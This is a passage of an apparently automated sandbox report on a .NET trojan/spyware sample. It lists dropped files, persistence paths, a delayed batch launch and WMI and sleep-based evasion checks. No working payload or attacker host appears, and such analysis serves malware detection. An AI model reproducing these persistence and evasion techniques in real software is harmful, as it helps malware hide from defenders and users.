                              Source: XNPOazHpXF.exe, 00000000.00000002.2138292682.000000001C55E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2113796055.0000000003D43000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000000.2052729222.000000000136A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe.0.dr Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: XNPOazHpXF.exe, V3J8u8DnaoyJKINZVJe.cs Cryptographic APIs: 'CreateDecryptor'
                              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/328@0/1
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\Users\user\Desktop\iSjOnjPm.log
                              Source: C:\Windows\InputMethod\CHT\services.exe Mutant created: NULL
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
                              Source: C:\Windows\InputMethod\CHT\services.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\886b964eacdf58df64ccd2e35a7cc93f02ef5b995bb1b61ec19d87c5f2d1fe93
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\Users\user\AppData\Local\Temp\gMaI3scL3q
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat"
                              Source: XNPOazHpXF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: XNPOazHpXF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Windows\InputMethod\CHT\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File read: C:\Users\desktop.ini
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: YvzNsoyEQb.7.dr, GYf3drC0FR.7.dr, m4KQfQtFPN.7.dr, POMdelZe2b.7.dr, IcnjKoD0Lh.7.dr, uYJiYgNb6j.7.dr, rvLCnUuNlo.7.dr, nPehugfo5q.7.dr, SuXvooZmu4.7.dr, 8p1RTDi4Qy.7.dr, U81FF4HJ9V.7.dr, OOYqLzQk4O.7.dr, JBGbz5npNf.7.dr, 5YhimTCY2k.7.dr, xUNavh1wji.7.dr, ra622pRlHs.7.dr, 3fLy2dY8uz.7.dr, Ymk9XrXgQL.7.dr, wMmH2lN0Y0.7.dr, LSltcqAhDi.7.dr, k3f0A2iAbM.7.dr, TQWrx8xby1.7.dr, kPvWKE024o.7.dr, k9BjmfARoD.7.dr, EySRZreafR.7.dr, h9FpCLu2Po.7.dr, 1LI40zC358.7.dr, gZJnkVSxDP.7.dr, oouO199VyA.7.dr, 2qHAeASJN9.7.dr, fBARfbLGPb.7.dr, c48Xb5A3EC.7.dr, nKvJJIyKKr.7.dr, 1xdpuai86K.7.dr, mYxPBk3luR.7.dr, WC64vTPHCK.7.dr, dGVqJLlM1n.7.dr, eL5pu6QxuA.7.dr, qfl5sTclEy.7.dr, Xg6OaNTVme.7.dr, 3bnSqGW5R7.7.dr, T34drojELq.7.dr, ZoWvXAfQI6.7.dr, LoDq9I1lAR.7.dr, ohPvh55mXf.7.dr, MIYBhrCUgm.7.dr, OHGJaKbV9E.7.dr, TJ17Vq0de4.7.dr, qfNzwgbTxb.7.dr, IqLvrobSmA.7.dr, ExQFCtUh7Q.7.dr, k2gOj7OrPh.7.dr, hT2weFkL3Q.7.dr, j9aTZ35Zq4.7.dr, qLqjY5X4dY.7.dr, MeRziK92q4.7.dr, iL7NxY1Htx.7.dr, KkX79GAGRf.7.dr, VBJ1Nyh6PB.7.dr, ku6LiiuD7i.7.dr, 4BiZY3BNMa.7.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: XNPOazHpXF.exe ReversingLabs: Detection: 73%
                              Source: XNPOazHpXF.exe Virustotal: Detection: 60%
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File read: C:\Users\user\Desktop\XNPOazHpXF.exe
                              Source: unknown Process created: C:\Users\user\Desktop\XNPOazHpXF.exe "C:\Users\user\Desktop\XNPOazHpXF.exe"
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\InputMethod\CHT\services.exe "C:\Windows\InputMethod\CHT\services.exe"
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: apphelp.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: ktmw32.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: amsi.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: userenv.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: ntmarta.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: propsys.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: dlnashext.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: wpdshext.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: edputil.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: urlmon.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: iertutil.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: srvcli.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: netutils.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: wintypes.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: appresolver.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: bcp47langs.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: slc.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: sppc.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Section loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                              Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: mscoree.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: apphelp.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: version.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: wldp.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: profapi.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: sspicli.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: ktmw32.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: amsi.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: userenv.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: wbemcomn.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: iphlpapi.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: dnsapi.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: dhcpcsvc6.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: dhcpcsvc.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: winnsi.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: rasapi32.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: rasman.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: rtutils.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: mswsock.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: winhttp.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: winmm.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: winmmbase.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: mmdevapi.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: devobj.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: ksuser.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: avrt.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: audioses.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: powrprof.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: umpdc.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: msacm32.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: midimap.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: edputil.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: dwrite.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: windowscodecs.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: ntmarta.dll
                              Source: C:\Windows\InputMethod\CHT\services.exe Section loaded: dpapi.dll
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: XNPOazHpXF.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: XNPOazHpXF.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: XNPOazHpXF.exe Static file information: File size 10393088 > 1048576
                              Source: XNPOazHpXF.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3b6a00
                              Source: XNPOazHpXF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              Source: XNPOazHpXF.exe, V3J8u8DnaoyJKINZVJe.cs | .Net Code: Type.GetTypeFromHandle(SnSyT2mpttk54uGLHux.c9ThURlkHyL(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(SnSyT2mpttk54uGLHux.c9ThURlkHyL(16777246)),Type.GetTypeFromHandle(SnSyT2mpttk54uGLHux.c9ThURlkHyL(16777260))})
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe | Code function: 0_2_00007FF849177AAA pushad ; retf 0_2_00007FF849177AAB
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe | Code function: 0_2_00007FF849176C30 pushad ; ret 0_2_00007FF849176C31
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe | Code function: 0_2_00007FF8491760B0 push edi; retf 0_2_00007FF8491760B6
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF84902C29C push esp; retn 0000h 7_2_00007FF84902C29D
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF84902C114 push edx; retn 0000h 7_2_00007FF84902C299
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF8490227A5 push eax; retf 7_2_00007FF8490227C9
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF84902CFE4 pushfd ; iretd 7_2_00007FF84902CFE5
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF849196C30 pushad ; ret 7_2_00007FF849196C31
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF8491960B0 push edi; retf 7_2_00007FF8491960B6
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF849196C8B pushad ; ret 7_2_00007FF849196C90
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF84988E2AC push ecx; iretd 7_2_00007FF84988E2AD
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF84988E1E9 push ecx; iretd 7_2_00007FF84988E1EA
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF84988D118 push eax; retf 7_2_00007FF84988D119
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF84988794D push ebx; retf 7_2_00007FF84988796A
                              Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 7_2_00007FF84988C030 push edx; iretd 7_2_00007FF84988E13F
                              Source: XNPOazHpXF.exe, multiple .cs classes | High entropy of concatenated method names

                              Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File created: C:\Windows\InputMethod\CHT\services.exe
                              Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\InputMethod\CHT\services.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File created: C:\Recovery\dllhost.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File created: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\Recovery\conhost.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\Windows\InputMethod\CHT\services.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\InputMethod\CHT\services.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Memory allocated: 1980000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Memory allocated: 1B870000 memory reserve | memory write watch
                              Source: C:\Windows\InputMethod\CHT\services.exe Memory allocated: 31C0000 memory reserve | memory write watch
                              Source: C:\Windows\InputMethod\CHT\services.exe Memory allocated: 1B1C0000 memory reserve | memory write watch
                              Source: C:\Windows\InputMethod\CHT\services.exe Code function: 7_2_00007FF849996398 sgdt fword ptr [eax]
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\InputMethod\CHT\services.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\InputMethod\CHT\services.exe Window / User API: threadDelayed 5511
                              Source: C:\Windows\InputMethod\CHT\services.exe Window / User API: threadDelayed 4082
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe TID: 6456 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 940 Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688 Thread sleep time: -12912720851596678s >= -30000s
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -592234s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -591906s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -591625s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -591297s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -590953s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -590562s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -590250s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589969s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589689s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589514s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589406s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589271s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589156s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -589046s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -588925s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -588812s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -588694s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -588272s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587875s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587765s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587654s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587546s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587437s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587328s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587219s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587104s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -587000s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe TID: 5688Thread sleep time: -586890s >= -30000sJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\InputMethod\CHT\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\InputMethod\CHT\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\InputMethod\CHT\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\InputMethod\CHT\services.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 599856Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 599000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 598406Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 598047Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 597500Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 597047Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596688Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596437Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596125Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595938Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595812Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595562Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595297Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595062Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594734Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594547Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594344Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 594135Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593656Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593359Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 593103Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592828Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592484Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 592234Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591906Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591625Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 591297Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590953Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590562Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 590250Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589969Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589689Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589514Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589406Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589271Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589156Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 589046Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588925Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588812Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588694Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 588272Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587875Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587765Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587654Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587546Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587437Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587328Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587219Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587104Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 587000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 586890Jump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File opened: C:\Users\user
